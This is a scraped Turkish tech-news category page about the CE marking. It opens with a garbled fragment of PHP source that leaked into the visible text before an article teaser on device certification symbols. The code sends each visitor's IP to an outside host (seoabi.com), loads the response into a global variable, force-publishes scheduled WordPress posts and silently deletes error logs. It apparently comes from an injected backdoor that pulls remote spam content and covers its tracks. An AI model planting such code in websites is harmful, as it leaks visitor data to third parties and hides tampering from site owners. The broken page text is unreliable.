$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> CE | Teknoloji Haberleri

CE kategorisindeki tüm yazılar

Son Yazılar

Bu semboller ne anlatıyor?

Ceplerimizin, laptop’larımızın ve diğerlerinin bir köşesindeki CE, FCC gibi sembollerin anlamı ne? Elektronik cihazlarımızın arkasında genellikle anlam veremediğimiz bir dizi işaretler ve kısaltmalar yer alıyor. Bu kısaltmaların uluslararası ticarette çok önemli bir yeri bulunuyor. İşte her bir işaretin anlamı. UL: Underwriters Laboratories, bağımsız, kâr amacı gütmeyen bir